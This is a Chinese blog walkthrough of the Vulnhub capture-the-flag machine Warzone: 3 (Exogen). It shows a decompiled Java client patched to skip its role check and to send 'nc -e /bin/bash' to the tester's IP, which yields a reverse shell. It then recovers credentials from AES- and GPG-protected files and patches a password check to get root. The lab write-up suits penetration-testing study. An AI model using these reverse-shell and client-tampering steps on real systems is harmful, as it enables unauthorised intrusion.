当前位置:网站首页>Warzone: 3 (Exogen) vulnhub walkthrough
Warzone: 3 (Exogen) vulnhub walkthrough
2022-08-02 03:25:00 【xdeclearn】
Warzone: 3 (Exogen)
vulnhub地址:http://www.vulnhub.com/entry/warzone-3-exogen,606/
0x01 信息收集到获取shell
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4444/tcp open tcpwrapped
ftp以anonymous登录,下载文件note.txt和alienclient.jar,其中note中含有登录用户名alienum和密码exogenesis。
接着反编译jar包,来到感兴趣的地方。
在Starter.java的actionPerformed方法中,判断用户权限时,由于存在本地鉴权问题(在idea调试过程中验证),所以在判断用户权限前添加一句role = "astronaut";来提升权限。
public void actionPerformed(ActionEvent e) {
if (e.getSource() == this.loginButton) {
String username = this.userTextField.getText();
String password = this.passwordField.getText();
try {
this.socket = new Socket("warzone.local", 4444);
this.os = new ObjectOutputStream(this.socket.getOutputStream());
RE login = new RE();
login.setToken(null);
login.setOption("LOGIN");
login.setCmd(null);
login.setValue(String.valueOf(username) + "@" + password);
this.os.writeObject(login);
this.is = new ObjectInputStream(this.socket.getInputStream());
RE response = (RE)this.is.readObject();
token = response.getToken();
role = token.getRole();
this.os.close();
this.socket.close();
if (response.getValue().equals("TRUE")) {
dashboard();
} else {
JOptionPane.showMessageDialog(this, "Invalid Username or Password");
}
} catch (IOException|ClassNotFoundException e1) {
e1.printStackTrace();
}
}
if (e.getSource() == this.resetButton) {
this.userTextField.setText("");
this.passwordField.setText("");
}
if (e.getSource() == this.showPassword)
if (this.showPassword.isSelected()) {
this.passwordField.setEchoChar('0');
} else {
this.passwordField.setEchoChar('*');
}
if (e.getSource() == this.viewButton)
role = "astronaut"; /*代码修改处*/
if (role.equals("researcher")) {
JOptionPane.showMessageDialog(this, "Permission Denied");
} else if (role.equals("astronaut")) {
try {
this.socket = new Socket("warzone.local", 4444);
this.os = new ObjectOutputStream(this.socket.getOutputStream());
RE list = new RE();
token.setRole(role);
list.setToken(token);
list.setOption("VIEW");
list.setCmd("LIST");
list.setValue(null);
this.os.writeObject(list);
this.is = new ObjectInputStream(this.socket.getInputStream());
RE response = (RE)this.is.readObject();
this.os.close();
this.socket.close();
reportList(response.getValue());
} catch (IOException e1) {
e1.printStackTrace();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
}
}
if (e.getSource() == this.uploadButton)
JOptionPane.showMessageDialog(this, "Has not been implemented");
}
继续跟代码,点击查看文档发现是执行代码list.setCmd("tail -5 " + f);,于是将它更改为list.setCmd("nc -e /bin/bash 192.168.56.103 8080");,重新编译执行。
public void reportList(String value) {
JFrame view = new JFrame("View Reports");
GridLayout list = new GridLayout(2, 2);
Container containerLIst = view.getContentPane();
containerLIst.setLayout(list);
containerLIst.setBackground(Color.GRAY);
String[] files = value.split("@");
byte b;
int i;
String[] arrayOfString1;
for (i = (arrayOfString1 = files).length, b = 0; b < i; ) {
final String f = arrayOfString1[b];
if (f.contains(".txt")) {
JButton name = new JButton(f);
name.addActionListener(new ActionListener() {
public void actionPerformed(ActionEvent e) {
try {
Starter.this.socket = new Socket("warzone.local", 4444);
Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());
RE list = new RE();
list.setToken(Starter.token);
list.setOption("VIEW");
list.setValue("VALUE");
list.setCmd("nc -e /bin/bash 192.168.56.103 8080"); /*代码修改处*/
Starter.this.os.writeObject(list);
Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());
RE response = (RE)Starter.this.is.readObject();
Starter.this.os.close();
Starter.this.socket.close();
Starter.this.reportValue(response.getValue());
} catch (IOException e1) {
e1.printStackTrace();
} catch (ClassNotFoundException e1) {
e1.printStackTrace();
}
}
});
containerLIst.add(name);
}
b++;
}
view.setVisible(true);
view.setBounds(10, 10, 370, 600);
view.setDefaultCloseOperation(3);
view.setResizable(true);
view.show();
}
成功反弹shell。
[email protected]:~$ nc -lvp 8080
listening on [any] 8080 ...
connect to [192.168.56.103] from warzone.local [192.168.56.124] 56454
id
uid=1001(exomorph) gid=1001(exomorph) groups=1001(exomorph)
0x02 获取anunnaki用户权限
将/home/exomorph目录下的aliens.encrypted和wrz3encryptor.jar下载到本地(通过nc下载-过程略)。反编译wrz3encryptor.jar。
private static void doCrypto(int cipherMode, String key, File inputFile, File outputFile) throws CryptoException {
try {
Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(cipherMode, secretKey);
FileInputStream inputStream = new FileInputStream(inputFile);
byte[] inputBytes = new byte[(int)inputFile.length()];
inputStream.read(inputBytes);
byte[] outputBytes = cipher.doFinal(inputBytes);
FileOutputStream outputStream = new FileOutputStream(outputFile);
outputStream.write(outputBytes);
inputStream.close();
outputStream.close();
} catch (NoSuchPaddingException|java.security.NoSuchAlgorithmException|java.security.InvalidKeyException|javax.crypto.BadPaddingException|javax.crypto.IllegalBlockSizeException|java.io.IOException ex) {
throw new CryptoException("Error encrypting/decrypting file", ex);
}
}
其实就是一个AES加密,看来整个warzone系列都喜欢弄点加密来迷惑人哈。以下是解密代码:
public static void decrypt(String key, File inputFile, File outputFile) {
doDeCrypto(2, key, inputFile, outputFile);
}
private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {
try {
Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(cipherMode, secretKey);
FileInputStream inputStream = new FileInputStream(inputFile);
byte[] inputBytes = new byte[(int)inputFile.length()];
inputStream.read(inputBytes);
byte[] outputBytes = cipher.doFinal(inputBytes);
FileOutputStream outputStream = new FileOutputStream(outputFile);
outputStream.write(outputBytes);
inputStream.close();
outputStream.close();
} catch (Exception ex) {
ex.printStackTrace();
}
}
代码其实就把ciphermode从1改为了2,得到用户名密码anunnaki:nak1nak1..。
[email protected]:~$ warzone3decrypt strings aliens.txt
minotaur:m1nom1no..
scylla:scyscy..
echidna:ech1ech1..
cyclops:cyccyc..
anunnaki:nak1nak1..
anunnaki:nak1nak2..
anunnaki:nakinaki..
ssh登陆后进入用户目录。
[email protected]:~$ ls
info.txt secpasskeeper.jar.gpg underboss.txt
[email protected]:~$ cat info.txt
Remember to use --batch,
otherwise the passphrase options will be ignored when you decrypt the gpg file
You know the pa[ssh]phrase
[email protected]:~$ cat underboss.txt
。。。。。。
EXOGEN {
WARZONE_UNDERBOSS_AL1EN }
0x03 获取root权限
按照提示解密secpasskeeper.jar.gpg
[email protected]:~$ gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg #passphrase为nak1nak1..
[email protected]:~$ ls
info.txt secpasskeeper.jar secpasskeeper.jar.gpg underboss.txt
通过nc将secpasskeeper.jar下载到本地逆向分析,将代码Main修改为
public class Main {
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
try {
Scanner in = new Scanner(System.in);
System.out.println("[Warzone 3] Root's Password Manager");
System.out.print("Secret passphrase : ");
String secret = in.nextLine();
Cryptor cryptor = new Cryptor();
Resources res = new Resources();
String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));
String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
if (true/*user.equals(sys)*/) {
/*代码修改处*/
String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
System.out.println("[+] Success, the password is : " + plaintext);
} else {
System.out.println("[x] Failed");
}
} catch (NullPointerException n) {
System.out.println("[!] Terminated");
System.exit(0);
}
}
public static String removeSalt(String salted) {
String unsalted = salted.replace("al13n", "");
return unsalted;
}
}
随意输入,得到root用户密码ufo_phosXEN。
[Warzone 3] Root's Password Manager
Secret passphrase : 123
[x] Invalid key length {
16 required}
[+] Success, the password is : ufo_phosXEN
[email protected]:~$ su - root
Password:
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~# ls
boss.txt cron Desktop Documents Downloads Music Pictures Public Templates Videos
[email protected]:~# cat boss.txt
。。。。。。
EXOGEN {
WARZONE_FINAL_BOSS }
by Alienum with <3
边栏推荐
- 稳定好用的短连接生成平台,支持API批量生成
- [mikehaertl/php-shellcommand]一个用于调用外部命令操作的库
- 13.JS输出内容和语法
- hackmyvm: juggling walkthrough
- [sebastian/diff] A historical change extension library for comparing two texts
- (1) print()函数、转义字符、二进制与字符编码 、变量、数据类型、input()函数、运算符
- 解决5+APP真机测试无法访问后台(同局域网)
- MySql Advanced -- Constraints
- (8) requests, os, sys, re, _thread
- TypeScript error error TS2469, error TS2731 solution
猜你喜欢
Several interesting ways to open PHP: from basic to perverted
IO流、 编码表、 字符流、 字符缓冲流
(7) 浅学 “爬虫” 过程 (概念+练习)
Eric靶机渗透测试通关全教程
SQL classification, DQL (Data Query Language), and corresponding SQL query statement demonstration
线程池(线程池介绍与使用)
解决 Zlibrary 卡死/找不到域名/达到限额问题,Zlibrary最新地址
Kali install IDEA
稳定好用的短连接生成平台,支持API批量生成
Kali环境下Frida编写脚本智能提示
随机推荐
二维码生成API接口,可以直接作为A标签连接
Batch replace file fonts, Simplified -> Traditional
MySql高级 -- 约束
hackmyvm: controller walkthrough
js预编译 GO 和AO
uniapp | 使用npm update更新后编译报错问题
PHP实现搜索框的自动反查提示
js 原型和原型链
[phpunit/php-timer] A timer for code execution time
Various ways of AES encryption
轮播图详解(完整代码在最后)
4.PHP数组与数组排序
PHP image compression to specified size
Kali install IDEA
(6) 学生信息管理系统设计
4. PHP array and array sorting
IO streams, byte stream and byte stream buffer
js 之 Object.defineProperty()
2. PHP variables, output, EOF, conditional statements
After the mailbox of the Pagoda Post Office is successfully set up, it can be sent but not received.